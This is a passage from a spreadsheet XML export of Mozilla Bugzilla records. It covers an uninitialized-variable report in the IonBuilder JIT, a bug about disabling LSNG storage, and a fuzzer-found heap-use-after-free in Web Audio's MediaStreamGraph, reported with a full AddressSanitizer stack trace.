      <c r="W4044" t="inlineStr">
        <is>
          <t>I happened to run js/src/tests/jstests.py in valgrind mode and found two unique errors, which I have confirmed. I don't yet know the scope of the problems. I believe both are relatively easy to fix.
First, the variable gotLambda in js/src/ion/IonBuilder.cpp is being used uninitialized. It is declared without an initializer, and the statement which would assign to it is inside an if statement and is not always executed. Several uses of gotLambda follow. This can probably be fixed by just initializing the gotLambda variable up front.
Second, js1_5/extensions/regress-341956-01.js and js1_2/Array/splice1.js see conditional jumps on uninitialized data. It appears a block gets created by js/src/ion/IonBuilder.cpp (inlineBlock) which is later discarded ("Natives may veto inlining"), but it still has a resume point which has a use of a value in a block that is not discarded. When range analysis walks def-use graphs, it finds this use and wanders into the discarded block, which has an uninitialized domIndex_ field. This can probably be fixed by clearing out the resume points of the block when it is discarded.</t>
        </is>
      </c>
      <c r="X4044" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4045">
      <c r="A4045" t="n">
        <v>1608449</v>
      </c>
      <c r="B4045" t="inlineStr">
        <is>
          <t>2020-01-10 06:58:07 -0800</t>
        </is>
      </c>
      <c r="C4045" t="inlineStr">
        <is>
          <t>Disable LSNG in 73</t>
        </is>
      </c>
      <c r="D4045" t="inlineStr">
        <is>
          <t>2020-02-25 12:10:26 -0800</t>
        </is>
      </c>
      <c r="E4045" t="n">
        <v>1</v>
      </c>
      <c r="F4045" t="n">
        <v>1</v>
      </c>
      <c r="G4045" t="n">
        <v>3</v>
      </c>
      <c r="H4045" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4045" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4045" t="inlineStr">
        <is>
          <t>Storage: localStorage &amp; sessionStorage</t>
        </is>
      </c>
      <c r="K4045" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4045" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4045" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4045" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4045" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4045" t="inlineStr"/>
      <c r="Q4045" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4045" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4045" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T4045" t="n">
        <v>1</v>
      </c>
      <c r="U4045" t="n">
        <v>0</v>
      </c>
      <c r="V4045" t="n">
        <v>15</v>
      </c>
      <c r="W4045" t="inlineStr">
        <is>
          <t>We can't ship it on Release until storage initialization failures are addressed.
There seems to be one failing test currently:
https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=c47f30849bb0db8950360149b311756f2b918fb7</t>
        </is>
      </c>
      <c r="X4045" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4046">
      <c r="A4046" t="n">
        <v>1544023</v>
      </c>
      <c r="B4046" t="inlineStr">
        <is>
          <t>2019-04-12 07:56:12 -0700</t>
        </is>
      </c>
      <c r="C4046" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free [@ mozilla::MediaStreamGraphImpl::UpdateGraph] with WRITE of size 8</t>
        </is>
      </c>
      <c r="D4046" t="inlineStr">
        <is>
          <t>2022-01-06 15:13:44 -0800</t>
        </is>
      </c>
      <c r="E4046" t="n">
        <v>1</v>
      </c>
      <c r="F4046" t="n">
        <v>1</v>
      </c>
      <c r="G4046" t="n">
        <v>3</v>
      </c>
      <c r="H4046" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4046" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4046" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K4046" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4046" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4046" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4046" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4046" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4046" t="inlineStr"/>
      <c r="Q4046" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4046" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4046" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T4046" t="n">
        <v>1</v>
      </c>
      <c r="U4046" t="n">
        <v>0</v>
      </c>
      <c r="V4046" t="n">
        <v>23</v>
      </c>
      <c r="W4046" t="inlineStr">
        <is>
          <t>Found while fuzzing mozilla-central rev c77962add953.  I don't currently have a working testcase but will update if one becomes available.
==1902==ERROR: AddressSanitizer: heap-use-after-free on address 0x614000d084d0 at pc 0x7fafbe3e9746 bp 0x7faf01506a90 sp 0x7faf01506a88
WRITE of size 8 at 0x614000d084d0 thread T20144 (MediaStreamGrph)
    #0 0x7fafbe3e9745 in mozilla::MediaStreamGraphImpl::UpdateGraph(long) /src/dom/media/MediaStreamGraph.cpp:1257:28
    #1 0x7fafbe3eced2 in mozilla::MediaStreamGraphImpl::OneIterationImpl(long) /src/dom/media/MediaStreamGraph.cpp:1399:3
    #2 0x7fafbe0a257a in mozilla::ThreadedDriver::RunThread() /src/dom/media/GraphDriver.cpp:311:41
    #3 0x7fafbe0b6a0d in mozilla::MediaStreamGraphInitThreadRunnable::Run() /src/dom/media/GraphDriver.cpp:208:14
    #4 0x7fafb586d496 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1180:14
    #5 0x7fafb587515d in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #6 0x7fafb6bd7421 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /src/ipc/glue/MessagePump.cpp:303:20
    #7 0x7fafb6aab79e in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #8 0x7fafb6aab79e in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #9 0x7fafb6aab79e in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #10 0x7fafb58655f3 in nsThread::ThreadFunc(void*) /src/xpcom/threads/nsThread.cpp:454:11
    #11 0x7fafdab8c5ad in _pt_root /src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #12 0x7fafda7ce6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #13 0x7fafd97ac88e in clone /build/glibc-OTsEL5/glibc-2.27/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
0x614000d084d0 is located 144 bytes inside of 432-byte region [0x614000d08440,0x614000d085f0)
freed by thread T20144 (MediaStreamGrph) here:
    #0 0x55786091d9e2 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fafbe3e7f0a in mozilla::MediaStreamGraphImpl::RunMessagesInQueue() /src/dom/media/MediaStreamGraph.cpp:1169:20
    #2 0x7fafbe3ece88 in mozilla::MediaStreamGraphImpl::OneIterationImpl(long) /src/dom/media/MediaStreamGraph.cpp:1396:3
    #3 0x7fafbe0a257a in mozilla::ThreadedDriver::RunThread() /src/dom/media/GraphDriver.cpp:311:41
    #4 0x7fafbe0b6a0d in mozilla::MediaStreamGraphInitThreadRunnable::Run() /src/dom/media/GraphDriver.cpp:208:14
    #5 0x7fafb586d496 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1180:14
    #6 0x7fafb587515d in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #7 0x7fafb6bd7421 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /src/ipc/glue/MessagePump.cpp:303:20
    #8 0x7fafb6aab79e in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #9 0x7fafb6aab79e in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #10 0x7fafb6aab79e in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #11 0x7fafb58655f3 in nsThread::ThreadFunc(void*) /src/xpcom/threads/nsThread.cpp:454:11
    #12 0x7fafdab8c5ad in _pt_root /src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #13 0x7fafda7ce6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
previously allocated by thread T0 (file:// Content) here:
    #0 0x55786091dd63 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5578609525fd in moz_xmalloc /src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7fafbeae7c47 in operator new /src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7fafbeae7c47 in mozilla::AudioNodeStream::Create(mozilla::dom::AudioContext*, mozilla::AudioNodeEngine*, unsigned int, mozilla::MediaStreamGraph*) /src/dom/media/webaudio/AudioNodeStream.cpp:76
    #4 0x7fafbeb31de5 in mozilla::dom::AudioParam::Stream() /src/dom/media/webaudio/AudioParam.cpp:83:13
    #5 0x7fafbeb3170c in mozilla::dom::AudioNode::Connect(mozilla::dom::AudioParam&amp;, unsigned int, mozilla::ErrorResult&amp;) /src/dom/media/webaudio/AudioNode.cpp:262:38
    #6 0x7fafba393e1b in mozilla::dom::AudioNode_Binding::connect(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::AudioNode*, JSJitMethodCallArgs const&amp;) /src/obj-firefox/dom/bindings/AudioNodeBinding.cpp:384:17
    #7 0x7fafbd150a81 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /src/dom/bindings/BindingUtils.cpp:3150:13
    #8 0x7fafc4968c77 in CallJSNative /src/js/src/vm/Interpreter.cpp:442:13
    #9 0x7fafc4968c77 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /src/js/src/vm/Interpreter.cpp:534
    #10 0x7fafc4951491 in CallFromStack /src/js/src/vm/Interpreter.cpp:593:10
    #11 0x7fafc4951491 in Interpret(JSContext*, js::RunState&amp;) /src/js/src/vm/Interpreter.cpp:3072
    #12 0x7fafc49330f8 in js::RunScript(JSContext*, js::RunState&amp;) /src/js/src/vm/Interpreter.cpp:422:10
    #13 0x7fafc49695e8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /src/js/src/vm/Interpreter.cpp:562:13
    #14 0x7fafc496b232 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/vm/Interpreter.cpp:605:8
    #15 0x7fafc4b26920 in Call /src/js/src/vm/Interpreter.h:98:10
    #16 0x7fafc4b26920 in PromiseReactionJob(JSContext*, unsigned int, JS::Value*) /src/js/src/builtin/Promise.cpp:1697
    #17 0x7fafc4968c77 in CallJSNative /src/js/src/vm/Interpreter.cpp:442:13
    #18 0x7fafc4968c77 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /src/js/src/vm/Interpreter.cpp:534
    #19 0x7fafc496b232 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/vm/Interpreter.cpp:605:8
    #20 0x7fafc55b7ba9 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/jsapi.cpp:2621:10
    #21 0x7fafbafad4bc in mozilla::dom::PromiseJobCallback::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /src/obj-firefox/dom/bindings/PromiseBinding.cpp:26:8
    #22 0x7fafb5606079 in Call /src/obj-firefox/dist/include/mozilla/dom/PromiseBinding.h:91:12
    #23 0x7fafb5606079 in Call /src/obj-firefox/dist/include/mozilla/dom/PromiseBinding.h:104
    #24 0x7fafb5606079 in mozilla::PromiseJobRunnable::Run(mozilla::AutoSlowOperation&amp;) /src/xpcom/base/CycleCollectedJSContext.cpp:236
    #25 0x7fafb55d861e in mozilla::CycleCollectedJSContext::PerformMicroTaskCheckPoint(bool) /src/xpcom/base/CycleCollectedJSContext.cpp:599:17
    #26 0x7fafbd9d044b in LeaveMicroTask /src/obj-firefox/dist/include/mozilla/CycleCollectedJSContext.h:212:7
    #27 0x7fafbd9d044b in ~nsAutoMicroTask /src/obj-firefox/dist/include/mozilla/CycleCollectedJSContext.h:315
    #28 0x7fafbd9d044b in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /src/dom/events/EventListenerManager.cpp:1047
Thread T20144 (MediaStreamGrph) created by T3718 (CubebOp~tion #2) here:
    #0 0x55786090667d in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7fafdab7e613 in _PR_CreateThread /src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7fafdab6809e in PR_CreateThread /src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7fafb5868569 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /src/xpcom/threads/nsThread.cpp:661:8
    #4 0x7fafb5873e15 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /src/xpcom/threads/nsThreadManager.cpp:416:12
    #5 0x7fafb5878fa4 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /src/xpcom/threads/nsThreadUtils.cpp:139:57
    #6 0x7fafbe0a0d9e in NS_NewNamedThread&lt;16&gt; /src/obj-firefox/dist/include/nsThreadUtils.h:71:10
    #7 0x7fafbe0a0d9e in mozilla::ThreadedDriver::Start() /src/dom/media/GraphDriver.cpp:226
    #8 0x7fafbe0a7b66 in SwitchToNextDriver /src/dom/media/GraphDriver.cpp:108:17
    #9 0x7fafbe0a7b66 in mozilla::AudioCallbackDriver::FallbackToSystemClockDriver() /src/dom/media/GraphDriver.cpp:1114
    #10 0x7fafbe0a4fd0 in mozilla::AudioCallbackDriver::Init() /src/dom/media/GraphDriver.cpp:580:5
    #11 0x7fafbe0a4599 in mozilla::AsyncCubebTask::Run() /src/dom/media/GraphDriver.cpp:436:21
    #12 0x7fafb587a061 in nsThreadPool::Run() /src/xpcom/threads/nsThreadPool.cpp:244:14
    #13 0x7fafb587af24 in non-virtual thunk to nsThreadPool::Run() /src/xpcom/threads/nsThreadPool.cpp
    #14 0x7fafb586d496 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1180:14
    #15 0x7fafb587515d in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #16 0x7fafb6bd7421 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /src/ipc/glue/MessagePump.cpp:303:20
    #17 0x7fafb6aab79e in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #18 0x7fafb6aab79e in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #19 0x7fafb6aab79e in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #20 0x7fafb58655f3 in nsThread::ThreadFunc(void*) /src/xpcom/threads/nsThread.cpp:454:11
    #21 0x7fafdab8c5ad in _pt_root /src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #22 0x7fafda7ce6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
Thread T3718 (CubebOp~tion #2) created by T3717 (MediaStreamGrph) here:
    #0 0x55786090667d in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7fafdab7e613 in _PR_CreateThread /src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7fafdab6809e in PR_CreateThread /src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7fafb5868569 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /src/xpcom/threads/nsThread.cpp:661:8
    #4 0x7fafb5873e15 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /src/xpcom/threads/nsThreadManager.cpp:416:12
    #5 0x7fafb5878fa4 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /src/xpcom/threads/nsThreadUtils.cpp:139:57
    #6 0x7fafb587883d in nsThreadPool::PutEvent(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /src/xpcom/threads/nsThreadPool.cpp:111:17
    #7 0x7fafb587b1d5 in nsThreadPool::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /src/xpcom/threads/nsThreadPool.cpp:290:5
    #8 0x7fafbe0a8825 in Dispatch /src/obj-firefox/dist/include/nsIEventTarget.h:37:14
    #9 0x7fafbe0a8825 in Dispatch /src/dom/media/GraphDriver.h:545
    #10 0x7fafbe0a8825 in mozilla::AudioCallbackDriver::Start() /src/dom/media/GraphDriver.cpp:696
    #11 0x7fafbe0a290b in SwitchToNextDriver /src/dom/media/GraphDriver.cpp:108:17
    #12 0x7fafbe0a290b in mozilla::ThreadedDriver::RunThread() /src/dom/media/GraphDriver.cpp:324
    #13 0x7fafbe0b6a0d in mozilla::MediaStreamGraphInitThreadRunnable::Run() /src/dom/media/GraphDriver.cpp:208:14
    #14 0x7fafb586d496 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1180:14
    #15 0x7fafb587515d in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #16 0x7fafb6bd7421 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /src/ipc/glue/MessagePump.cpp:303:20
    #17 0x7fafb6aab79e in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #18 0x7fafb6aab79e in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #19 0x7fafb6aab79e in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #20 0x7fafb58655f3 in nsThread::ThreadFunc(void*) /src/xpcom/threads/nsThread.cpp:454:11
    #21 0x7fafdab8c5ad in _pt_root /src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #22 0x7fafda7ce6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
Thread T3717 (MediaStreamGrph) created by T3716 (CubebOp~tion #1) here:
    #0 0x55786090667d in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7fafdab7e613 in _PR_CreateThread /src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7fafdab6809e in PR_CreateThread /src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7fafb5868569 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /src/xpcom/threads/nsThread.cpp:661:8
    #4 0x7fafb5873e15 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /src/xpcom/threads/nsThreadManager.cpp:416:12
    #5 0x7fafb5878fa4 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /src/xpcom/threads/nsThreadUtils.cpp:139:57
    #6 0x7fafbe0a0d9e in NS_NewNamedThread&lt;16&gt; /src/obj-firefox/dist/include/nsThreadUtils.h:71:10
    #7 0x7fafbe0a0d9e in mozilla::ThreadedDriver::Start() /src/dom/media/GraphDriver.cpp:226
    #8 0x7fafbe0a7b66 in SwitchToNextDriver /src/dom/media/GraphDriver.cpp:108:17
    #9 0x7fafbe0a7b66 in mozilla::AudioCallbackDriver::FallbackToSystemClockDriver() /src/dom/media/GraphDriver.cpp:1114
    #10 0x7fafbe0a4fd0 in mozilla::AudioCallbackDriver::Init() /src/dom/media/GraphDriver.cpp:580:5
    #11 0x7fafbe0a4599 in mozilla::AsyncCubebTask::Run() /src/dom/media/GraphDriver.cpp:436:21
    #12 0x7fafb587a061 in nsThreadPool::Run() /src/xpcom/threads/nsThreadPool.cpp:244:14
    #13 0x7fafb587af24 in non-virtual thunk to nsThreadPool::Run() /src/xpcom/threads/nsThreadPool.cpp
    #14 0x7fafb586d496 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1180:14
    #15 0x7fafb587515d in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #16 0x7fafb6bd7421 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /src/ipc/glue/MessagePump.cpp:303:20
    #17 0x7fafb6aab79e in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #18 0x7fafb6aab79e in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #19 0x7fafb6aab79e in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #20 0x7fafb58655f3 in nsThread::ThreadFunc(void*) /src/xpcom/threads/nsThread.cpp:454:11
    #21 0x7fafdab8c5ad in _pt_root /src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #22 0x7fafda7ce6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
Thread T3716 (CubebOp~tion #1) created by T0 (file:// Content) here:
    #0 0x55786090667d in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7fafdab7e613 in _PR_CreateThread /src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7fafdab6809e in PR_CreateThread /src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7fafb5868569 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /src/xpcom/threads/nsThread.cpp:661:8
    #4 0x7fafb5873e15 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /src/xpcom/threads/nsThreadManager.cpp:416:12
    #5 0x7fafb5878fa4 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /src/xpcom/threads/nsThreadUtils.cpp:139:57
    #6 0x7fafb587883d in nsThreadPool::PutEvent(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /src/xpcom/threads/nsThreadPool.cpp:111:17
    #7 0x7fafb587b1d5 in nsThreadPool::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, unsigned int) /src/xpcom/threads/nsThreadPool.cpp:290:5
    #8 0x7fafbe0a8825 in Dispatch /src/obj-firefox/dist/include/nsIEventTarget.h:37:14
    #9 0x7fafbe0a8825 in Dispatch /src/dom/media/GraphDriver.h:545
    #10 0x7fafbe0a8825 in mozilla::AudioCallbackDriver::Start() /src/dom/media/GraphDriver.cpp:696
    #11 0x7fafbe3ef554 in mozilla::MediaStreamGraphImpl::RunInStableState(bool) /src/dom/media/MediaStreamGraph.cpp:1727:17
    #12 0x7fafbe41d46e in mozilla::(anonymous namespace)::MediaStreamGraphStableStateRunnable::Run() /src/dom/media/MediaStreamGraph.cpp:1591:15
    #13 0x7fafb55d6097 in mozilla::CycleCollectedJSContext::ProcessStableStateQueue() /src/xpcom/base/CycleCollectedJSContext.cpp:382:12
    #14 0x7fafb55d91c2 in mozilla::CycleCollectedJSContext::AfterProcessTask(unsigned int) /src/xpcom/base/CycleCollectedJSContext.cpp:441:3
    #15 0x7fafb7d46465 in XPCJSContext::AfterProcessTask(unsigned int) /src/js/xpconnect/src/XPCJSContext.cpp:1273:28
    #16 0x7fafb586e159 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1240:24
    #17 0x7fafb587515d in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #18 0x7fafbfbc1cc3 in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2910:31)&gt; /src/obj-firefox/dist/include/nsThreadUtils.h:348:25
    #19 0x7fafbfbc1cc3 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*, bool) /src/dom/xhr/XMLHttpRequestMainThread.cpp:2910
    #20 0x7fafbfbbf53d in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable&lt;mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString&gt; const&amp;, mozilla::ErrorResult&amp;) /src/dom/xhr/XMLHttpRequestMainThread.cpp:2684:11
    #21 0x7fafbc3cbcba in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&amp;) /src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1345:9
    #22 0x7fafbd150a81 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /src/dom/bindings/BindingUtils.cpp:3150:13
    #23 0x7fafc4968c77 in CallJSNative /src/js/src/vm/Interpreter.cpp:442:13
    #24 0x7fafc4968c77 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /src/js/src/vm/Interpreter.cpp:534
    #25 0x7fafc5b3b02b in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/jit/BaselineIC.cpp:3879:10
    #26 0x7faf6b8e8887  (&lt;unknown module&gt;)
    #27 0x6290016aa2cf  (&lt;unknown module&gt;)
    #28 0x7faf6b8e64de  (&lt;unknown module&gt;)
    #29 0x7fafc5d310e1 in EnterBaseline /src/js/src/jit/BaselineJIT.cpp:111:5
    #30 0x7fafc5d310e1 in js::jit::EnterBaselineAtBranch(JSContext*, js::InterpreterFrame*, unsigned char*) /src/js/src/jit/BaselineJIT.cpp:189
    #31 0x7fafc495d20d in Interpret(JSContext*, js::RunState&amp;) /src/js/src/vm/Interpreter.cpp:1979:24
    #32 0x7fafc49330f8 in js::RunScript(JSContext*, js::RunState&amp;) /src/js/src/vm/Interpreter.cpp:422:10
    #33 0x7fafc49695e8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /src/js/src/vm/Interpreter.cpp:562:13
    #34 0x7fafc496b232 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/vm/Interpreter.cpp:605:8
    #35 0x7fafc55b7ba9 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /src/js/src/jsapi.cpp:2621:10
    #36 0x7fafbc754770 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /src/obj-firefox/dom/bindings/EventListenerBinding.cpp:52:8
    #37 0x7fafbd9d0202 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #38 0x7fafbd9d0202 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /src/dom/events/EventListenerManager.cpp:1039
    #39 0x7fafbd9d2833 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /src/dom/events/EventListenerManager.cpp:1240:17
    #40 0x7fafbd9b2a00 in HandleEvent /src/obj-firefox/dist/include/mozilla/EventListenerManager.h:355:5
    #41 0x7fafbd9b2a00 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /src/dom/events/EventDispatcher.cpp:349
    #42 0x7fafbd9b0c28 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /src/dom/events/EventDispatcher.cpp:551:16
